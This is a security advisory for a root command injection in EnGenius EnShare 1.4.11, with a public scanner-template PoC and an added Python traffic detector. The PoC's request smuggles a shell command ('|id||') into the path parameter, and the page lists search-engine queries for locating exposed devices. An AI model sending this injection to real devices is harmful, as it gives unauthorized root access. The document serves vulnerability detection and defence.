CVE-2025-34035: EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution

Date: 2025-08-01 | Affected software: EnGenius EnShare IoT Gigabit Cloud Service | PoC: public

Vulnerability description

An OS command injection vulnerability exists in EnGenius EnShare Cloud Service version 1.4.11 and earlier. The usbinteract.cgi script fails to properly sanitize user input passed to the path parameter, allowing unauthenticated remote attackers to inject arbitrary shell commands. The injected commands are executed with root privileges, leading to full system compromise.

PoC code [public]

id: CVE-2025-34035

info:
  name: EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution
  author: intelligent-ears
  severity: critical
  description: |
    An OS command injection vulnerability exists in EnGenius EnShare Cloud Service version 1.4.11 and earlier.The usbinteract.cgi script fails to properly sanitize user input passed to the path parameter, allowing unauthenticated remote attackers to inject arbitrary shell commands.The injected commands are executed with root privileges, leading to full system compromise.
  impact: |
    Unauthenticated attackers can inject and execute arbitrary shell commands with root privileges through the path parameter in usbinteract.cgi, achieving complete system compromise.
  remediation: |
    Upgrade EnGenius EnShare Cloud Service to version 1.4.12 or later that properly sanitizes user input in CGI scripts.
  reference:
    - https://cxsecurity.com/issue/WLB-2017060050
    - https://www.exploit-db.com/exploits/42114
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34035
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 10.0
    cve-id: CVE-2025-34035
    epss-score: 0.07633
    epss-percentile: 0.91637
    cwe-id: CWE-78
  metadata:
    verified: true
    shodan-query: html:"/web/cgi-bin/usbinfo.cgi"
    fofa-query: body="/web/cgi-bin/usbinfo.cgi"
    max-request: 1
  tags: cve,cve2025,engenius,enshare,rce,vkev,vuln

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=7&path="|id||"

    payloads:
      path:
        - "/web/cgi-bin/usbinteract.cgi"
        - "/cgi-bin/usbinteract.cgi"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "regex('uid=([0-9(a-z_)]+) gid=([0-9(a-z_)]+)', body)"
          - 'contains(body, "Content-type: text/html")'
          - "status_code == 200"
        condition: and
# digest: 490a00463044022018ed010da5ef1de057e282a157c31a2d4ece26f1d35393eaefc79c294d0de01102200c7aacd316bd413748949e7b04aedf972a2c01a5ff5f596a8fc075aa3205bdd2:922c64590222798bb761d5b6d8e72950
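
For defenders, the request and response conditions in the template above can be turned into a traffic check, shown here as an added example that is not part of the template or of any EnGenius code. The character allowlist for a legitimate `path` value and the sample traffic are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Both endpoint locations listed in the template's payloads.
ENDPOINT = re.compile(r"/(?:web/)?cgi-bin/usbinteract\.cgi$", re.IGNORECASE)
# Assumption: a legitimate share path needs only these characters.
UNSAFE = re.compile(r"[^A-Za-z0-9_./ -]")
# Same pattern the template's matcher applies to the response body.
ID_OUTPUT = re.compile(r"uid=([0-9(a-z_)]+) gid=([0-9(a-z_)]+)")


def inspect_request(uri, body):
    """Return (source, value, unsafe_chars) for each suspicious path parameter."""
    target, _, query = uri.partition("?")
    if not ENDPOINT.search(target):
        return []
    findings = []
    for source, raw in (("query", query), ("body", body)):
        # parse_qs percent-decodes once, so %7C and a literal | look the same.
        for value in parse_qs(raw, keep_blank_values=True).get("path", []):
            unsafe = sorted(set(UNSAFE.findall(value)))
            if unsafe:
                findings.append((source, value, unsafe))
    return findings


def response_leaks_id(body):
    """True when a response body carries id(1) output, as the matcher expects."""
    return ID_OUTPUT.search(body) is not None


# Constructed sample traffic (not captured from a real device).
SAMPLES = [
    ("/web/cgi-bin/usbinteract.cgi", 'action=7&path="|id||"'),
    ("/cgi-bin/usbinteract.cgi", "action=7&path=%22%7Cid%7C%7C%22"),
    ("/web/cgi-bin/usbinteract.cgi", "action=7&path=/mnt/usb1/photos"),
    ("/web/cgi-bin/usbinfo.cgi", 'path="|id||"'),
]

if __name__ == "__main__":
    for uri, body in SAMPLES:
        print(uri, body, "->", inspect_request(uri, body) or "clean")
```

The same allowlist can back a reverse-proxy or WAF rule in front of devices that cannot yet be upgraded to the fixed version named in the remediation field.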
